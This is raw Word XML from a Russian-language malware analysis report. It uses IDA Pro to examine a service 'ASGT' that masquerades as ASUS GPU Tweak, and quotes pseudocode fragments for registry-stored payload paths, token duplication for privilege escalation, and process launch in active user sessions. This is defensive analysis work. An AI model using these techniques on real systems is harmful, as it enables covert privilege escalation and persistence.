          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Загруженный вредоносный исполняемый файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C2969" w14:textId="33CE6E6C" w:rsidR="00F46E5A" w:rsidRPr="00EB26C0" w:rsidRDefault="00F46E5A" w:rsidP="00F46E5A"/>
    <w:p w14:paraId="416B6009" w14:textId="36A5C0AC" w:rsidR="001E0155" w:rsidRDefault="009A68B4" w:rsidP="00BA5DEF">
      <w:r>
        <w:t xml:space="preserve">Видно, что создаваемые дочерние процессы маскируются под системные. Поэтому сначала проведем статический анализ в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, отыскав функции связанные с созданием сервисов из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADVAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="009A68B4">
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="009A68B4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA5DEF">
        <w:t xml:space="preserve"> Таким образом были найдены функции, псевдокоды которых представлены на рисунках ниже</w:t>
      </w:r>
      <w:r w:rsidR="00BA5DEF" w:rsidRPr="00BA5DEF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDD4ABF" w14:textId="77777777" w:rsidR="00BA5DEF" w:rsidRPr="00BA5DEF" w:rsidRDefault="00BA5DEF" w:rsidP="00BA5DEF"/>
    <w:p w14:paraId="494BEB43" w14:textId="77777777" w:rsidR="00BA5DEF" w:rsidRDefault="00BA5DEF" w:rsidP="00BA5DEF">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F12A3E0" wp14:editId="02149EAD">
            <wp:extent cx="4767580" cy="32761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3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D9C2" w14:textId="77F9879F" w:rsidR="001E0155" w:rsidRDefault="00BA5DEF" w:rsidP="00BA5DEF">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF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BA5DEF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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Функция установки и удаления, запуска службы под именем '</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391C72C" w14:textId="77777777" w:rsidR="00BA5DEF" w:rsidRDefault="00BA5DEF" w:rsidP="00BA5DEF">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4295252E" wp14:editId="6784AA0F">
            <wp:extent cx="5205132" cy="3829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5132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800C" w14:textId="5F0432D4" w:rsidR="00BA5DEF" w:rsidRDefault="00BA5DEF" w:rsidP="00BA5DEF">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF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BA5DEF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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Основная функция-точка входа установленной службы '</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">', вызывающая основную вредоносную функцию </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_409</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>40()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A206200" w14:textId="77777777" w:rsidR="00AD6001" w:rsidRDefault="00BA5DEF" w:rsidP="00AD6001">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA5DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E900BBE" wp14:editId="274D719A">
            <wp:extent cx="6120130" cy="25361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DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD6001" w:rsidRPr="00AD6001">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD997DA" wp14:editId="0AC73AA6">
            <wp:extent cx="6120130" cy="25457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001" w:rsidRPr="00AD6001">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD6001" w:rsidRPr="00AD6001">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BA72265" wp14:editId="77E9D859">
            <wp:extent cx="6120130" cy="25412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7F87" w14:textId="5E8A7633" w:rsidR="00AD6001" w:rsidRPr="00AD6001" w:rsidRDefault="00AD6001" w:rsidP="00AD6001">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AD600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D600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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Часть псевдокода основной вредоносной функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C03DC0E" w14:textId="77777777" w:rsidR="00AD6001" w:rsidRDefault="00AD6001" w:rsidP="00AD6001">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D7F2847" wp14:editId="38DF2928">
            <wp:extent cx="6120130" cy="25647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001">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B872FC" wp14:editId="49A5E8FD">
            <wp:extent cx="6120130" cy="25133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78D7" w14:textId="7284F260" w:rsidR="00AD6001" w:rsidRDefault="00AD6001" w:rsidP="00AD6001">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AD600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D600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11</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Часть псевдокода основной вредоносной функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACDB7F" w14:textId="1948A881" w:rsidR="00AD6001" w:rsidRDefault="00AD6001" w:rsidP="00AD6001">
      <w:r>
        <w:t>Из псевдокод</w:t>
      </w:r>
      <w:r w:rsidR="00D27562">
        <w:t>а функции можно обратить внимание на следующие моменты</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6001">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB9431" w14:textId="439AFC1F" w:rsidR="00D27562" w:rsidRDefault="00AD6001" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6001">
        <w:t>Вредонос маскируется под утилиту ASUS GPU Tweak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF1AAC3" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="1211"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115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strcpy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D27562">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="A626A4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char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27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SubKey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50A14F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Software\\Asus\\GPU_Tweak\\SettingPage"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6B0B95BD" w14:textId="5E8A1C9F" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A58374A" w14:textId="3F1CF021" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Чтение конфигурации из реестра</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CAEB80" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691DB303" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562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RegQueryValueExA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phkResult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50A14F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Main :Auto run path"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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type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Data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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cbData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36978CB" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562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RegQueryValueExA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phkResult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50A14F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Main :Enable MonitorPage"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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type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v14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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v24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434E712" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="1211" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A17615" w14:textId="56A24A74" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27562">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Main</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Auto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:t>" - содержит путь к исполняемо</w:t>
      </w:r>
      <w:r>
        <w:t>му файлу (вредоносной нагрузке)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC6DB6" w14:textId="12340D25" w:rsidR="00AD6001" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"Main :Enable MonitorPage" - флаг режима работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E9051A" w14:textId="77777777" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="502" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C48A5C5" w14:textId="716F63CC" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Эскалация привилегий через токены (создание экземпляра копии для выделения привилегий)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157892E" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562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OpenProcessToken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GetCurrentProcess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B76B01"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2u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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TokenHandle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16365DF0" w14:textId="39638D05" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562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383A42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DuplicateTokenEx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v2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B76B01"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x2000000u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SecurityAnonymous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TokenPrimary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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phNewToken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3B25C578" w14:textId="552EB4C1" w:rsidR="00D27562" w:rsidRPr="00A8138A" w:rsidRDefault="00D27562" w:rsidP="00D27562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383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD931F7" w14:textId="01CA3CBD" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Поиск активных пользовательских сессий для внедрения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122BACF" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00A8138A" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8138A">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WTSEnumerateSessionsA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A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138A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8138A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138A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A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8138A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138A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="B76B01"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A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138A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A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A8138A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ppSessionInfo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A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138A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A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A8138A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8138A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6C65741C" w14:textId="0B55BFAA" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27562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ppSessionInfo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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">State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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WTSActive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&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ppSessionInfo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D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SessionId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3A696AD" w14:textId="2BD481F0" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1289A99C" w14:textId="798CE2CA" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Запуск процесса с повышенными привилегиями под активной пользовательской сессией.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761CFE88" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115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SetTokenInformation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v3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TokenSessionId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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
